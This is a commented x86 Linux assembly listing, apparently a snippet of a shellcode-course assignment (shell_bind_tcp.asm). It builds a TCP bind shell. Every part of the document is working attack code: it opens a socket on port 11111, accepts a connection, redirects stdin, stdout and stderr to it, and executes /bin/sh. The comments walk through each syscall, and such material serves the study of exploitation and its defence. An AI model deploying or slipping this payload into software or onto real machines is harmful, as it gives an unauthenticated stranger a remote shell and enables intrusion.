ASM Socket

1. ; This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp.asm
2.  
3. global _start
4.  
5. section .text
6.  
7. _start:
8.  
9.     ; syscalls (/usr/include/asm/unistd_32.h)
10.     ; socketcall numbers (/usr/include/linux/net.h)
11.  
12.     ; Creating the socket file descriptor
13.     ; int socket(int domain, int type, int protocol);
14.     ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
15.  
16.     mov eax, 102        ; syscall 102 - socketcall
17.     mov ebx, 1      ; socketcall type (sys_socket 1)
18.  
19.     ; socket arguments (bits/socket.h, netinet/in.h)
20.     push 0          ; IPPROTO_IP = 0 (int)
21.     push 1          ; SOCK_STREAM = 1 (int)
22.     push 2          ; AF_INET = 2 (int)
23.  
24.     mov ecx, esp        ; ptr to argument array
25.  
26.     int 0x80        ; kernel interruption
27.  
28.     mov edx, eax        ; saving the returned socket file descriptor
29.  
30.  
31.     ; Avoiding SIGSEGV when trying to reconnect before the kernel to close the socket previously opened
32.     ; this problem happens in most shellcodes, even in the Metasploit, because they do not care
33.     ; about the reuse of the socket address
34.     ; int setsockopt(int sockfd, int level, int optname, const void *optval, socklen_t optlen);
35.     ; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &socklen_t, socklen_t)
36.  
37.         mov eax, 102        ; syscall 102 - socketcall
38.         mov ebx, 14     ; socketcall type (sys_setsockopt 14)
39.  
40.         push 4                  ; sizeof socklen_t
41.         push esp                ; address of socklen_t - on the stack
42.         push 2                  ; SO_REUSEADDR = 2
43.         push 1                  ; SOL_SOCKET = 1
44.         push edx                ; sockfd
45.  
46.         mov ecx, esp        ; ptr to argument array
47.  
48.         int 0x80        ; kernel interrupt
49.  
50.  
51.     ; Biding the socket with an address type
52.     ; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
53.     ; bind(sockfd, [AF_INET, 11111, INADDR_ANY], 16)
54.  
55.     mov eax, 102        ; syscall 102 - socketcall
56.     mov ebx, 2      ; socketcall type (sys_bind 2)
57.  
58.     ; building the sockaddr_in struct (sys/socket.h, netinet/in.h and bits/sockaddr.h)
59.     push 0          ; INADDR_ANY = 0 (uint32_t)
60.     push WORD 0x672b    ; port in byte reverse order = 11111 (uint16_t)
61.     push WORD 2     ; AF_INET = 2 (unsigned short int)
62.     mov ecx, esp        ; struct pointer
63.  
64.     ; bind arguments (sys/socket.h)
65.     push 16         ; sockaddr struct size = sizeof(struct sockaddr) = 16 (socklen_t)
66.     push ecx        ; sockaddr_in struct pointer (struct sockaddr *)
67.     push edx        ; socket fd (int)
68.  
69.     mov ecx, esp        ; ptr to argument array
70.  
71.     int 0x80        ; kernel interrruption
72.  
73.  
74.     ; Preparing to listen the incoming connection (passive socket)
75.     ; int listen(int sockfd, int backlog);
76.     ; listen(sockfd, 0);
77.  
78.     mov eax, 102        ; syscall 102 - socketcall
79.     mov ebx, 4      ; socketcall type (sys_listen 4)
80.  
81.     ; listen arguments
82.     push 0          ; backlog (connections queue size)
83.     push edx        ; socket fd
84.  
85.     mov ecx, esp        ; ptr to argument array
86.  
87.     int 0x80        ; kernel interruption
88.  
89.  
90.     ; Accepting the incoming connection
91.     ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
92.     ; accept(sockfd, NULL, NULL)
93.  
94.         mov eax, 102            ; syscall 102 - socketcall
95.         mov ebx, 5              ; socketcall type (sys_accept 5)
96.  
97.     ; accept arguments
98.     push 0          ; NULL - we don't need to know anything about the client
99.     push 0          ; NULL - we don't need to know anything about the client
100.     push edx        ; socket fd
101.  
102.     mov ecx, esp        ; ptr to argument array
103.  
104.     int 0x80        ; kernel interruption
105.  
106.     mov edx, eax        ; saving the returned socket fd (client)
107.  
108.  
109.     ; Creating a interchangeably copy of the 3 file descriptors (stdin, stdout, stderr)
110.     ; int dup2(int oldfd, int newfd);
111.     ; dup2(clientfd, ...)
112.  
113.     mov eax, 63     ; syscall 63 - dup2
114.     mov ebx, edx        ; oldfd (client socket fd)
115.     mov ecx, 0      ; stdin file descriptor
116.  
117.     int 0x80        ; kernel interruption
118.  
119.         mov eax, 63
120.         mov ecx, 1      ; stdout file descriptor
121.  
122.         int 0x80
123.  
124.         mov eax, 63
125.         mov ecx, 2      ; stderr file descriptor
126.  
127.         int 0x80
128.  
129.  
130.     ; Finally, using execve to substitute the actual process with /bin/sh
131.     ; int execve(const char *filename, char *const argv[], char *const envp[]);
132.     ; exevcve("/bin/sh", NULL, NULL)
133.  
134.     mov eax, 11     ; execve syscall
135.  
136.     ; execve string argument
137.     push 0          ; null byte
138.     push 0x68732f2f     ; "//sh"
139.     push 0x6e69622f     ; "/bin"
140.  
141.     mov ebx, esp        ; ptr to "/bin//sh" string
142.     mov ecx, 0      ; null ptr to argv
143.     mov edx, 0      ; null ptr to envp
144.  
145.     int 0x80        ; bingo